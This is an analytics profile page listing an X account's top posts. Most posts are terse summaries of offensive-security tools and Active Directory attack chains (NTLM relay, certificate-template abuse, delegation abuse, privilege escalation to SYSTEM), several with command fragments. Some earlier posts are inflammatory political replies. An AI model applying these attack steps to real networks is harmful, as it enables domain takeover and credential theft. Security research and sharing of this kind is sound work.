# ![@0Beider Avatar](https://lunarcrush.com/gi/w:26/cr:twitter::1730704952828289024.png) @0Beider dar_beider_0🇪🇸

dar_beider_0🇪🇸 posts on X about shell, token, target, hex the most. They currently have [------] followers and [---] posts still getting attention that total [------] engagements in the last [--] hours.

### Engagements: [------] [#](/creator/twitter::1730704952828289024/interactions)
![Engagements Line Chart](https://lunarcrush.com/gi/w:600/cr:twitter::1730704952828289024/c:line/m:interactions.svg)

- [--] Week [---] -51%
- [--] Month [-----] +145%
- [--] Months [-----] +347%
- [--] Year [-----] +4,588%

### Mentions: [--] [#](/creator/twitter::1730704952828289024/posts_active)
![Mentions Line Chart](https://lunarcrush.com/gi/w:600/cr:twitter::1730704952828289024/c:line/m:posts_active.svg)

- [--] Month [--] -50%
- [--] Months [--] +217%
- [--] Year [---] +1,233%

### Followers: [------] [#](/creator/twitter::1730704952828289024/followers)
![Followers Line Chart](https://lunarcrush.com/gi/w:600/cr:twitter::1730704952828289024/c:line/m:followers.svg)

- [--] Week [--] -2.50%
- [--] Month [--] +4%
- [--] Months [--] +30%
- [--] Year [--] +316%

### CreatorRank: [---------] [#](/creator/twitter::1730704952828289024/influencer_rank)
![CreatorRank Line Chart](https://lunarcrush.com/gi/w:600/cr:twitter::1730704952828289024/c:line/m:influencer_rank.svg)

### Social Influence

**Social category influence**
[technology brands](/list/technology-brands)  [finance](/list/finance)  [cryptocurrencies](/list/cryptocurrencies)  [countries](/list/countries)  [stocks](/list/stocks) 

**Social topic influence**
[shell](/topic/shell), [token](/topic/token) #3308, [target](/topic/target), [hex](/topic/hex), [ip](/topic/ip), [$token](/topic/$token) #63, [relay](/topic/relay), [github](/topic/github), [secret](/topic/secret), [accounting](/topic/accounting)

**Top accounts mentioned or mentioned by**
[@greatmartis](/creator/undefined) [@realdonaldtrump](/creator/undefined) [@pmviktororban](/creator/undefined) [@thehackersnews](/creator/undefined) [@capitanaespana](/creator/undefined) [@contrastado](/creator/undefined) [@europablanca65](/creator/undefined) [@modoalt](/creator/undefined) [@dejanirasilveir](/creator/undefined) [@srspinola](/creator/undefined) [@eduardomenoni](/creator/undefined) [@srliberal](/creator/undefined) [@radiogenoa](/creator/undefined) [@dariocpx](/creator/undefined) [@lairdsummerisle](/creator/undefined) [@bleepincomputer](/creator/undefined) [@billtoulas](/creator/undefined) [@theyellowfall](/creator/undefined) [@rightanglenews](/creator/undefined) [@cr0nym](/creator/undefined)

**Top assets mentioned**
[TokenFi (TOKEN)](/topic/$token) [IBM (IBM)](/topic/ibm) [Null (NULL)](/topic/$null) [Alphabet Inc Class A (GOOGL)](/topic/$googl)
### Top Social Posts
Top posts by engagements in the last [--] hours

"@Capitana_espana hay que hacer una purga general"  
[X Link](https://x.com/0Beider/status/1749041524208275518)  2024-01-21T12:09Z [--] followers, [--] engagements


"@contrastado solo suben los ladrones"  
[X Link](https://x.com/anyuser/status/1749813457577525662)  2024-01-23T15:16Z [--] followers, [--] engagements


"@Europa_Blanca65 paal ferry todos"  
[X Link](https://x.com/0Beider/status/1752357194459218047)  2024-01-30T15:44Z [--] followers, [--] engagements


"@ModoAlt salir de la UE. no representa a nadie. solo a los asesinos vende almas por su vicio de dar vueltas en sus mierda de jets"  
[X Link](https://x.com/0Beider/status/1753161454138613975)  2024-02-01T21:00Z [--] followers, [--] engagements


"@dejanirasilveir Muchas cabezas tienen que rodar"  
[X Link](https://x.com/0Beider/status/1762966569380897198)  2024-02-28T22:22Z [--] followers, [--] engagements


"@SrSpinola Secret Service Compromised by DEI policy so alternative politician is killed"  
[X Link](https://x.com/0Beider/status/1812751151936274570)  2024-07-15T07:28Z [--] followers, [--] engagements


"@eduardomenoni a la crcel para siempre"  
[X Link](https://x.com/0Beider/status/1813112561358741716)  2024-07-16T07:24Z [--] followers, [--] engagements


"@SrLiberal Rezar y tened mucha fe en Dis todopoderoso. Lo est limpiando todo empezando por los lderes polticos. Se acabo para las ratas corruptas. Justicia Divina"  
[X Link](https://x.com/0Beider/status/1814578366365778366)  2024-07-20T08:29Z [--] followers, [--] engagements


"@RadioGenoa este cuando era joven era ruso"  
[X Link](https://x.com/0Beider/status/1819797928350789926)  2024-08-03T18:10Z [--] followers, [--] engagements


"@DarioCpx @great_martis reinventing meaning of accounting law"  
[X Link](https://x.com/0Beider/status/1856999452441014514)  2024-11-14T09:55Z [--] followers, [--] engagements


"@great_martis they have a history of creative accounting. this is not the first time they do it"  
[X Link](https://x.com/0Beider/status/1858473677974593975)  2024-11-18T11:33Z [--] followers, [---] engagements


"@realDonaldTrump europe is gone to crap thanks to this nightmare"  
[X Link](https://x.com/0Beider/status/1875118511884009622)  2025-01-03T09:54Z [--] followers, [--] engagements


"@realDonaldTrump Thank you God for all the Blessings. Here is my support for when things move in the right direction"  
[X Link](https://x.com/0Beider/status/1881979258761003108)  2025-01-22T08:16Z [--] followers, [--] engagements


"@LairdSummerisle Thanks It has always been my dream to be so prepared like no-one else can and still be ignored and left for dead by the markets worldwide. what a shit hole this has become"  
[X Link](https://x.com/0Beider/status/1916966985839128808)  2025-04-28T21:25Z [--] followers, [--] engagements


"@BleepinComputer @billtoulas anything you get open source is a risk. you must have a serious [--] eye control layer in between. certainly inspect what youre creating/ updating"  
[X Link](https://x.com/0Beider/status/1919707530164359623)  2025-05-06T10:55Z [--] followers, [--] engagements


"@PM_ViktorOrban Will be my pleasure to be part of MAGA/MEGA and tech endeavors if the opportunity arises. For now lefties keep discarding Gods light in favour of jazabel spirit"  
[X Link](https://x.com/0Beider/status/1922205079844614557)  2025-05-13T08:19Z [--] followers, [--] engagements


"@the_yellow_fall securing your iot is hard"  
[X Link](https://x.com/0Beider/status/1922564091941417100)  2025-05-14T08:06Z [--] followers, [--] engagements


"@Rightanglenews scary that is not automatic for all to see. put the autopen on the top of a mountain or make it illegal"  
[X Link](https://x.com/0Beider/status/1924742439685763161)  2025-05-20T08:22Z [--] followers, [--] engagements


"@cr0nym why are you so defensive 😂😝"  
[X Link](https://x.com/0Beider/status/1925883498260300200)  2025-05-23T11:56Z [--] followers, [--] engagements


"@YuG0rd . 91% of the environments Akamai investigated users outside the domain administrator group were found to have the necessary privileges to carry out this attack"  
[X Link](https://x.com/0Beider/status/1927311290797641939)  2025-05-27T10:29Z [--] followers, [--] engagements


"@tbbhunter amateurs not using overflow checks. 223M. wankers"  
[X Link](https://x.com/0Beider/status/1927456937580372374)  2025-05-27T20:08Z [--] followers, [--] engagements


"@TheHackersNews classic upgrade to azure-cloud-adcs. you think they thought it through but they never did"  
[X Link](https://x.com/0Beider/status/1935030206680420393)  2025-06-17T17:42Z [--] followers, [---] engagements


"@TheHackersNews 592M hack. true security anyone"  
[X Link](https://x.com/0Beider/status/1936368719724269922)  2025-06-21T10:20Z [--] followers, [---] engagements


"@ULTIMAHORAENX Spain is just pain. They are unable to see their own gems. leaders are champs on thieving not handling remote wisdom"  
[X Link](https://x.com/0Beider/status/1937796870480507174)  2025-06-25T08:55Z [--] followers, [--] engagements


"Windows Updates pick-old-crappy-version attack: craft custom downgrades and expose past fixed vulnerabilities. Presented at Black Hat USA [----] https://github.com/SafeBreach-Labs/WindowsDowndate https://github.com/SafeBreach-Labs/WindowsDowndate"  
[X Link](https://x.com/0Beider/status/1938955961969918170)  2025-06-28T13:41Z [--] followers, [--] engagements


"@CyberWarship LexiCrypt shellcode encryptor and encoding transforms shellcode bytes into lexicon https://github.com/tehstoni/LexiCrypt https://github.com/tehstoni/LexiCrypt"  
[X Link](https://x.com/0Beider/status/1939038738577006852)  2025-06-28T19:10Z [--] followers, [---] engagements


"@chrissanders88 Yara scan generator now detecting new-rule-lumma-new https://github.com/CAPESandbox/CAPE-parsers/pull/35 https://github.com/CAPESandbox/CAPE-parsers/pull/35"  
[X Link](https://x.com/0Beider/status/1942841419024195598)  2025-07-09T07:01Z [--] followers, [--] engagements


"Nord Stream [----] malicious secret extractor inside CI/CD envs by deploying attack pipelines (Azure DevOps Github Gitlab) https://github.com/synacktiv/nord-stream https://github.com/synacktiv/nord-stream"  
[X Link](https://x.com/0Beider/status/1946658909336297513)  2025-07-19T19:50Z [--] followers, [--] engagements


"distro-backdoor-scanner [----] scans for backdoors on distro OSs https://github.com/dmore/distro-backdoor-scanner-blue https://github.com/dmore/distro-backdoor-scanner-blue"  
[X Link](https://x.com/0Beider/status/1946867558738436417)  2025-07-20T09:39Z [--] followers, [--] engagements


"Powershell-Backdoor-generator [----] reverse backdoor generator. new signature x build. creates payloads [--] standard Flipper0 Hak5 USB Rubber Ducky https://github.com/Drew-Alleman/powershell-backdoor-generator https://github.com/Drew-Alleman/powershell-backdoor-generator"  
[X Link](https://x.com/0Beider/status/1946908835567837572)  2025-07-20T12:23Z [--] followers, [--] engagements


"SeatBelt - still going [----] ; situational awareness windows c sharp. performs host 'safety' checks. both offensive && defensive https://github.com/GhostPack/Seatbelt https://github.com/GhostPack/Seatbelt"  
[X Link](https://x.com/0Beider/status/1948314965863010577)  2025-07-24T09:31Z [--] followers, [--] engagements


"Shellz 2023-2025 reverse shell generator. powershell and python. obfuscation https://github.com/dmore/shells-revs-red https://github.com/dmore/shells-revs-red"  
[X Link](https://x.com/0Beider/status/1949537977333424520)  2025-07-27T18:30Z [--] followers, [--] engagements


"Beelzebub [----] [----] advanced llm simulation with MCP honeypot to detect prompt injection attacks against LLM agents. SSH HTTP TCP. k8s ready. https://github.com/dmore/beelzebub-honeypot-blue-defend-k8s/tree/main https://github.com/dmore/beelzebub-honeypot-blue-defend-k8s/tree/main"  
[X Link](https://x.com/0Beider/status/1949846175386915202)  2025-07-28T14:55Z [--] followers, [--] engagements


"LivingOffTheCOM [----] post expl abuses implicit type coercion abuse. Custom .Net object with overriden .toString() stealthily called when passed to a COM object like https://github.com/andreisss/Living-off-the-COM-Type-Coercion-Abuse http://Shell.App https://github.com/andreisss/Living-off-the-COM-Type-Coercion-Abuse http://Shell.App"  
[X Link](https://x.com/0Beider/status/1950463367841227109)  2025-07-30T07:47Z [--] followers, [--] engagements


"Wonder why I liked cyberark https://www.csoonline.com/article/4031259/palo-alto-networks-to-buy-cyberark-for-25b-as-identity-security-takes-center-stage.html https://www.csoonline.com/article/4031259/palo-alto-networks-to-buy-cyberark-for-25b-as-identity-security-takes-center-stage.html"  
[X Link](https://x.com/0Beider/status/1950829571982402002)  2025-07-31T08:03Z [--] followers, [--] engagements


"Bincrypter [----] pack encrypt and heavily obfuscate ELF binaries and shell scripts in bash. Morph + different signature every time. In memory. No temp files. LotL techniques . S t e a l t h y https://github.com/dmore/bincrypter-red-morph-encrypt-elf-shell-in-mem-stealth/ https://github.com/dmore/bincrypter-red-morph-encrypt-elf-shell-in-mem-stealth/"  
[X Link](https://x.com/0Beider/status/1951370450711486664)  2025-08-01T19:52Z [--] followers, [--] engagements


"Kraken [----] all-in-one brute force network: FTP K8s LDAP VOIP SSH telnet Wifi WPA3. Also finds Admin panels plus several brute force web-app tools https://github.com/dmore/Kraken-red-all-in-one-brute-force-attack-toolkit/ https://github.com/dmore/Kraken-red-all-in-one-brute-force-attack-toolkit/"  
[X Link](https://x.com/0Beider/status/1951570890996478448)  2025-08-02T09:08Z [--] followers, [--] engagements


"NimExec [----] fileless remote command exec service; protocol MS-SCMR; changes binary path of service run by LocalSystem to execute && restores it later via RPC packets (sent via SMB2svcctl); nim crafted packages; STEALTHY https://github.com/dmore/NimExec-red-lat-mov-fileless-remote-code-exec-MSSCMR-SMB2-SVCCTL-rpcnim https://github.com/dmore/NimExec-red-lat-mov-fileless-remote-code-exec-MSSCMR-SMB2-SVCCTL-rpcnim"  
[X Link](https://x.com/0Beider/status/1954082408170443213)  2025-08-09T07:28Z [--] followers, [--] engagements


"Certifried [----] ADCS privesc (domain) attack; domain-joined-user creating comp-acc is allowed to change dns-hostname and servicePrincipal attributes of comp acc. Finally get the cert with certipy. This cert to be used as Pass-The-Cert && grab TGT && auth https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4 https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4"  
[X Link](https://x.com/0Beider/status/1955199085138374832)  2025-08-12T09:26Z [--] followers, [--] engagements


"whoAMI-scanner [----] C O N F U S I O N A T T A C K tricks users by spoofing name; tool scans your aws accounts for untrusted && unverified community account instances. https://github.com/dmore/whoAMI-scanner-red-blue https://github.com/dmore/whoAMI-scanner-red-blue"  
[X Link](https://x.com/0Beider/status/1955644058262708494)  2025-08-13T14:54Z [--] followers, [--] engagements


"CloudBrute [----] [----] find target domain infra open buckets databases files and apps on top cloud providers AMZ GC AZ DO Alibaba Vultr Linode; https://github.com/dmore/CloudBrute-enum-red https://github.com/dmore/CloudBrute-enum-red"  
[X Link](https://x.com/0Beider/status/1957505814735786188)  2025-08-18T18:12Z [--] followers, [--] engagements


"CloudCopy [----] shadow copy attack vs DC in AWS; any user with EC2:CreateSnapshot can steal hashes of all domain users by creating a snapshot of the DC; mount it to a controlled instance; then export NTDS.dit and SYSTEM registry hive for impacket secret. https://github.com/Static-Flow/CloudCopy https://github.com/Static-Flow/CloudCopy"  
[X Link](https://x.com/0Beider/status/1957570741433417865)  2025-08-18T22:30Z [--] followers, [--] engagements


"exploit multi-domain AD forest trust; mimikatz 2017; extract trust keys from lsadump; forge trust ticket (inter-realm TGT); states the ticket holder is an EA in the AD Forest; use forged-tgt to get a TGS for target service in final domain is now EA; inject TGS & God access"  
[X Link](https://x.com/0Beider/status/1959558732561387973)  2025-08-24T10:09Z [--] followers, [--] engagements


"blog by Sean Metcalf [----] Black Hat https://adsecurity.org/p=1588 https://adsecurity.org/p=1588"  
[X Link](https://x.com/0Beider/status/1959560129335976137)  2025-08-24T10:15Z [--] followers, [--] engagements


"weaponizing DCOM; coercing foreign NTLMv2-SSP hash; RemoteMonologue 2025; responder listening for leak hashes; https://github.com/dmore/RemoteMonologue-red-weaponise-DCOM-NTLM-auth-coercion-creds-harvester https://github.com/dmore/RemoteMonologue-red-weaponise-DCOM-NTLM-auth-coercion-creds-harvester"  
[X Link](https://x.com/0Beider/status/1963338491456036870)  2025-09-03T20:29Z [--] followers, [--] engagements


"IBM blog https://www.ibm.com/think/x-force/remotemonologue-weaponizing-dcom-ntlm-authentication-coercions/ https://www.ibm.com/think/x-force/remotemonologue-weaponizing-dcom-ntlm-authentication-coercions/"  
[X Link](https://x.com/0Beider/status/1963339486831493136)  2025-09-03T20:33Z [--] followers, [--] engagements


"ESC2 cert template abuse targets DC; Certipy [----] 2025; pinpoint template vulns enum vuln cert templates request certs impersonate and requst cert as admin; -on-behalf-of administrator; https://github.com/ly4k/Certipy https://github.com/ly4k/Certipy"  
[X Link](https://x.com/0Beider/status/1963618897480798665)  2025-09-04T15:03Z [--] followers, [--] engagements


"ESC8 abuse AD CS HTTP-cert-enrollment-endpoint with dirkjanm/krbrelayx [----] 2024; needs ADCS web enrollment enabled; catch NTLM hash with printerbug RPC back connect; NTLM relay on && obtain pfx ; ask for a tgt with pfx; saves TGT to cache"  
[X Link](https://x.com/0Beider/status/1965426304133878056)  2025-09-09T14:45Z [--] followers, [--] engagements


"@PM_ViktorOrban and Russian drones over Poland. EU needs to be burned down not fixed"  
[X Link](https://x.com/0Beider/status/1966029774981304379)  2025-09-11T06:43Z [--] followers, [--] engagements


"ESC11 attack CA via RPC 2025; certipy-ad; coercer coerce [----] DC to send NTLM creds back to relay listener; authenticate as DC with the captured cert && ldap-shell; extract admin nt hash with netexec smb; gains full system shell on DC impacket psexec; blog https://www.hackingarticles.in/adcs-esc11-relaying-ntlm-to-icpr/ https://www.hackingarticles.in/adcs-esc11-relaying-ntlm-to-icpr/"  
[X Link](https://x.com/0Beider/status/1966064519194812599)  2025-09-11T09:01Z [--] followers, [--] engagements


"step [--] initiate certipy-ad relay over rpc onto ca ip with DomainController template and leave it listening for coerce to trap DC next"  
[X Link](https://x.com/0Beider/status/1966066022873551304)  2025-09-11T09:07Z [--] followers, [--] engagements


"step [--] coercer coerce trick the Domain Controller into sending its credentials to our attacker relay listener"  
[X Link](https://x.com/0Beider/status/1966066349375201721)  2025-09-11T09:08Z [--] followers, [--] engagements


"Responder [----] 2025; MultiRelay Poisoner IPv6/IPv4 LLMNR/NBT-NS/mDNS Poisoner and NTLMv1/2 Relay; Supports NTLMv1v2 hashes with Extended Security NTLMSSP; built-in SMB HTTPs MSSQL DCE-RPC FTP POP3 IMAP SMTP DNS WPAD auth server; https://github.com/dmore/Responder-red-NNMLR-NBTNS-MDNS-poisoner-rogue-auth-serv-NTLM https://github.com/dmore/Responder-red-NNMLR-NBTNS-MDNS-poisoner-rogue-auth-serv-NTLM"  
[X Link](https://x.com/0Beider/status/1968315484694356334)  2025-09-17T14:05Z [--] followers, [--] engagements


"NTLM Reflection attack 2025; dnstool with srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA localhost-like dns record; PetitPotam && ntlmrelayx -t SRV1.ASGARD.LOCAL -smb2support; receives auth and exploits lsass.exe system privs to start RemoteRegistry && dump local SAM hashes"  
[X Link](https://x.com/0Beider/status/1972984366390559099)  2025-09-30T11:18Z [--] followers, [--] engagements


"synacktiv [----] blog https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025/ https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025/"  
[X Link](https://x.com/0Beider/status/1972986158922801214)  2025-09-30T11:25Z [--] followers, [--] engagements


"Taking over corp bound TCP [---] to redirect NTLM auth to hacker-external-C2 with basil00/WinDivert Driver [----] 2022; user-mode packet intercept capture modify drop; PortBender [----] aggressor script integrates with CS; redirect & backdoor modes ; https://github.com/dmore/PortBender-red-TCP-port-redirection-utility-with-driver-also-backdoor-mode-with-agressor-script-CS/ https://github.com/dmore/PortBender-red-TCP-port-redirection-utility-with-driver-also-backdoor-mode-with-agressor-script-CS/"  
[X Link](https://x.com/0Beider/status/1973325745478049856)  2025-10-01T09:54Z [--] followers, [--] engagements


"portBender redirect mode: redirect all traffic from port [---] to i.e. hacker-ntlm-smb-relay-tool-say-running on port 8445"  
[X Link](https://x.com/0Beider/status/1973326604307964168)  2025-10-01T09:58Z [--] followers, [--] engagements


"specterops blog [----] https://posts.specterops.io/relay-your-heart-away-an-opsec-conscious-approach-to-445-takeover-1c9b4666c8ac https://posts.specterops.io/relay-your-heart-away-an-opsec-conscious-approach-to-445-takeover-1c9b4666c8ac"  
[X Link](https://x.com/0Beider/status/1973327779505774655)  2025-10-01T10:02Z [--] followers, [--] engagements


"NTLM relay attack with Lsarelayx 2021; has a fake LSA auth provider liblsarelayx.dll hook the NTLM and negotiates packages to ease redir-auth-reqs = lsarelayx && user-mode console app lsarelayx.exe && ntlmrelayx server module RAW; active && passive mode"  
[X Link](https://x.com/0Beider/status/1973355951966265596)  2025-10-01T11:54Z [--] followers, [--] engagements


"specterops blog on taking over TCP [---] for external relaying https://posts.specterops.io/relay-your-heart-away-an-opsec-conscious-approach-to-445-takeover-1c9b4666c8ac https://posts.specterops.io/relay-your-heart-away-an-opsec-conscious-approach-to-445-takeover-1c9b4666c8ac"  
[X Link](https://x.com/0Beider/status/1973389852423905608)  2025-10-01T14:09Z [--] followers, [--] engagements


"NTLM relay attack to LDAP with signing enabled; Drop-the-MIC(2) CVE-2019-1040; remove the Message Integrity Check protection; negotiate NTLMv1 downgrade; impacket ntlmrelayx; modify NTLM auth request mid-relay;"  
[X Link](https://x.com/0Beider/status/1974520333094052243)  2025-10-04T17:01Z [--] followers, [---] engagements


"blog NTLM relaying to LDAP [----] https://logan-goins.com/2024-07-23-ldap-relay/ https://logan-goins.com/2024-07-23-ldap-relay/"  
[X Link](https://x.com/0Beider/status/1974523602008756395)  2025-10-04T17:14Z [--] followers, [--] engagements


"RPC Firewall [---] zero networks [----] 2025; D E F E N D R P C; windows lat mov attacks exploit RPC; Mimikatz LSAdump DCSync Remote DCOM PetitPotam WMIC psexec. ; RpcFwManager.exe + RpcFirewall.dll + RpcMessages.dll; Combines with advanced RPC filters is proven & potent"  
[X Link](https://x.com/0Beider/status/1974877360697811013)  2025-10-05T16:40Z [--] followers, [--] engagements


"RemotePotato0 [----] RPCtoHTTP relay DCOM abuse; attack from kali to a windows2019 server low-priv foothold termina with two users one normal one super-admin ; zero to domain admin cross-session priv esc; normal_user becomes domain_admin"  
[X Link](https://x.com/0Beider/status/1975543206831136950)  2025-10-07T12:46Z [--] followers, [--] engagements


"GodPotato [----] 2023; DCOM priv esc low priv terminal on windows [----] to [----] with 'ImpersonatePrivilege' to 'NT AUTHORITYSYSTEM' ; allows to customise DCOM ClsId; runs your command and ups to syste; also lets you execute reverse shells commands https://github.com/dmore/GodPotato-red-privesc-dcom-impersonate-priviledge-gain-system/tree/main https://github.com/dmore/GodPotato-red-privesc-dcom-impersonate-priviledge-gain-system/tree/main"  
[X Link](https://x.com/0Beider/status/1975967274621338056)  2025-10-08T16:51Z [--] followers, [--] engagements


"Ghost Potato [----] NTLM Reflection Attack; abuse webDAV SMB auth; partially fixed AI says is still there; timing attack to purge the Challenge Cache ; deliberate fail auth attempt can flush older challenges; custom ntlmrelayx drops rat.exe to startup folder"  
[X Link](https://x.com/0Beider/status/1976340805796450714)  2025-10-09T17:35Z [--] followers, [--] engagements


"internalAllTheThings https://swisskyrepo.github.io/InternalAllTheThings/active-directory/internal-relay-ntlm/#common-issues-forwarding-port-445 https://swisskyrepo.github.io/InternalAllTheThings/active-directory/internal-relay-ntlm/#common-issues-forwarding-port-445"  
[X Link](https://x.com/0Beider/status/1976345246423449695)  2025-10-09T17:53Z [--] followers, [--] engagements


"RustPotato 2025; rust godpotato; priv esc tool abuses DCOM and RPC to leverage 'SeImpersonatePrivilege' and gain 'NT AUTHORITYSYSTEM' privileges on windows systems; https://github.com/dmore/RustPotato-red-dcom-rpc-named-pipes-gain-system-tcp-reverse-shell/ https://github.com/dmore/RustPotato-red-dcom-rpc-named-pipes-gain-system-tcp-reverse-shell/"  
[X Link](https://x.com/0Beider/status/1976595455607005227)  2025-10-10T10:27Z [--] followers, [--] engagements


"examples cmd execution or reverse with cmd or powershell terminal"  
[X Link](https://x.com/0Beider/status/1976596630234394735)  2025-10-10T10:32Z [--] followers, [--] engagements


"LandRun [----] how to run linux process in a secure sandbox ; like firejail but with kernel-level security using landrock LSM https://github.com/Zouuup/landrun https://github.com/Zouuup/landrun"  
[X Link](https://x.com/0Beider/status/1948649952210546933)  2025-07-25T07:42Z [--] followers, [--] engagements


"PivotSuite [----] [----] lateral move; network multi-level pivoting toolkit ; admin access not needed; C2 ; fwd & reverse tun TCP ; UDP; socks [--] proxy server; NTLM auth; network enum ( host discovery port scan cmd exec); dyn port fwd SSH reverse https://github.com/RedTeamOperations/PivotSuite https://github.com/RedTeamOperations/PivotSuite"  
[X Link](https://x.com/0Beider/status/1952996837306081647)  2025-08-06T07:35Z [--] followers, [--] engagements


"Subverting AD LAPS 2022; crafting AD malicious container object types the 'Computers' Container msImaging-PSPs object malicious-container to subvert LAPS-audit-script detection; DS_CONTROL_ACCESS ms-Mcs-AdmPwd; granting low-pri user access to admin pwd stealthily"  
[X Link](https://x.com/0Beider/status/1983826541214933197)  2025-10-30T09:21Z [--] followers, [--] engagements


"Step [--] - (Get-DomainUser johnsmith).memberof -eq $null; True; Get-DomainComputer Exchange -Properties ms-Mcs-AdmPwd; renders pwd;"  
[X Link](https://x.com/0Beider/status/1983830268034023934)  2025-10-30T09:36Z [--] followers, [--] engagements


"Abusing AD GPO && constrained Delegation; abuse SeEnableDelegationPrivilege; self grant GenericAll rights from att to low-pri DU; grant WriteDacl to Default DC GPO; add badguy to the GPO trusted list of ; Kekeo to inject ticket for LDAP/DC; DCSync & mimikatz; gain NThash krbtgt"  
[X Link](https://x.com/0Beider/status/1984577276776689764)  2025-11-01T11:04Z [--] followers, [--] engagements


"Step [--] - execute backdoor = force-reset patsy user pwd regain ability to auth for patsy ; take advantage of WriteDacl right given by badguy; add malicious ACE to "Default Domain Controllers" GPO for patsy by patsy -rights All"  
[X Link](https://x.com/0Beider/status/1984578682275483738)  2025-11-01T11:10Z [--] followers, [--] engagements


"Step [--] - set-DomainObject patsy Set @('msds-allowedtodelegate'='LDAP/PRIMARY.testlab.local'; 'serviceprincipalname'='blah/nonex';) -XOR @(useraccountcontrol-167.216); get-DomainUser patsy now renders TRUSTED_TO_AUTH_FOR_DELEGATION"  
[X Link](https://x.com/0Beider/status/1984580393274683611)  2025-11-01T11:16Z [--] followers, [--] engagements


"warpnet/COM-Fuzzer oct-2025; Fuzzing DCOM COM CLSID; discover vulns; gain insight on COMDCOM impl; exploits remote command exec https://github.com/dmore/COM-Fuzzer-red-find-vulnerable-D-COM-clsid/ https://github.com/dmore/COM-Fuzzer-red-find-vulnerable-D-COM-clsid/"  
[X Link](https://x.com/0Beider/status/1984919218391798193)  2025-11-02T09:43Z [--] followers, [--] engagements


"Fuzzing over DCOM warpnet/COMFuzzer 2025; remotely invoke procedures with credentials; Invoke-ComFuzzer -RemoteServer x; it fuzzes COM on remote system; blog [----] https://www.incendium.rocks/posts/Automating-COM-Vulnerability-Research/#chapter-3--automating https://www.incendium.rocks/posts/Automating-COM-Vulnerability-Research/#chapter-3--automating"  
[X Link](https://x.com/0Beider/status/1985318786522583202)  2025-11-03T12:10Z [--] followers, [--] engagements


"Step [--] - fuzzing over DCOM with high priv creds"  
[X Link](https://x.com/0Beider/status/1985319197711520016)  2025-11-03T12:12Z [--] followers, [--] engagements


"Step [--] - fuzz DCOM remote system; example with Invoke-ComFuzzer -RemoteServer ip && high-priv-creds"  
[X Link](https://x.com/0Beider/status/1985319753016344597)  2025-11-03T12:14Z [--] followers, [--] engagements


"RBCD delegate attack AddAllowedToAct when MachineAccount=0; user can edit msds-AllowedToActOnBehalfOfOtherIdentity; add target-user as account that can delegate-to DC$ action write; getTGT as target-user; change-pwd -newhashes for targetu; request ST impersonate admin; DCsync"  
[X Link](https://x.com/0Beider/status/1990802602859118626)  2025-11-18T15:21Z [--] followers, [--] engagements


"Step [--] - request a service ticket for the Administration user on the CIFS SPN; -u2u -impersonate Administrator -spn cifs/DC domain/target-user -k --no-pass; verify with netexec smb using new_admin_impersonator-ticket cache; pwned http://getST.py http://getST.py"  
[X Link](https://x.com/0Beider/status/1990805834067280324)  2025-11-18T15:34Z [--] followers, [--] engagements


"DefenderWrite 2025; win11 24h2 msdef 4.18; inject malicious dlls on AVEDR executable folders; list exes in c:windows with write perms into the exec folder; drop malicious.dll on Win Def abusing c:win.system32msiexec.exe https://github.com/dmore/DefenderWrite-red-finding-abusing-whitelisted-prog-allow-arbitrary-file-writing-on-exec-folder-AV https://github.com/dmore/DefenderWrite-red-finding-abusing-whitelisted-prog-allow-arbitrary-file-writing-on-exec-folder-AV"  
[X Link](https://x.com/0Beider/status/1991478663817347160)  2025-11-20T12:08Z [--] followers, [---] engagements


"Step [--] Intro to the tool DefenderWrite; DefenderWrite.exe writing to protected folder and dropping malicious test.dll"  
[X Link](https://x.com/0Beider/status/1991479596668301614)  2025-11-20T12:11Z [--] followers, [--] engagements


"Penelope [----] shell handler; modern replacement for nc ; for RCE exploitation; post-expl workflows; run peass-ng in memory; upload privesc scripts; upload dangerous exploits straight from ; interact with sessions ids ; download etc ok; meterpreter module http://exploit.com http://exploit.com"  
[X Link](https://x.com/0Beider/status/1996288468582863060)  2025-12-03T18:40Z [--] followers, [--] engagements


"penelope [----] repo https://github.com/dmore/penelope-red-linux-shell-handler-ng-nodisk-meterpreter-DisablePayloadHandler https://github.com/dmore/penelope-red-linux-shell-handler-ng-nodisk-meterpreter-DisablePayloadHandler"  
[X Link](https://x.com/0Beider/status/1996292643819577371)  2025-12-03T18:57Z [--] followers, [--] engagements


"ConditionalPolReviewer 2025; pow tool audit EntraID Conditional Access pols & MFA compliance; needs GraphAPI read perms ( Policy dir audit log read all ); Comprehensive MFA Detection: Maps users to Conditional Access policies through direct assignment and group membership"  
[X Link](https://x.com/0Beider/status/1996526669730128259)  2025-12-04T10:27Z [--] followers, [--] engagements


"CVEScanner v2 [----] 2025; nmap script; recon scan open ports enhanced with CVE likely vulns based on versions discovered; needs cve.db ( can build own db with an authorised NVD API key from NIST ) https://github.com/dmore/CVEScannerV2-blue-red-recon-CVE-vulns-scanner https://github.com/dmore/CVEScannerV2-blue-red-recon-CVE-vulns-scanner"  
[X Link](https://x.com/0Beider/status/1996888687385498016)  2025-12-05T10:25Z [--] followers, [--] engagements


"fuzzing subdomain bruteforce with ffuf [----] [----] and feroxbuster [----] 2025; discovering php cloud subdom aspect persistance ; 0xdf hacks stuff recon; htb era dec-2025; https://0xdf.gitlab.io/2025/11/29/htb-era.html#recon https://0xdf.gitlab.io/2025/11/29/htb-era.html#recon"  
[X Link](https://x.com/0Beider/status/1996933294844268886)  2025-12-05T13:22Z [--] followers, [--] engagements


"fuzzing unification framework ffuf [----] [----] repo https://github.com/dmore/fuzzuf-red-dsl-hierarflow-fuzz-loops-extensible-framework https://github.com/dmore/fuzzuf-red-dsl-hierarflow-fuzz-loops-extensible-framework"  
[X Link](https://x.com/0Beider/status/1996933685379993699)  2025-12-05T13:24Z [--] followers, [--] engagements


"PsMapExec [----] [----] ev NetExec; loads in mem no touch disk; needs EDR bypass; stealthy AD compromiser; dumps SAM and LSASS hashes; remote cmd exec; kerbdump module; can rely on kerberos; kerberoast; extract ekeys; timeroast: find files; ACL persistance; DCSyncldap; NTDS dumpsmb"  
[X Link](https://x.com/0Beider/status/1998454346233647496)  2025-12-09T18:07Z [--] followers, [--] engagements


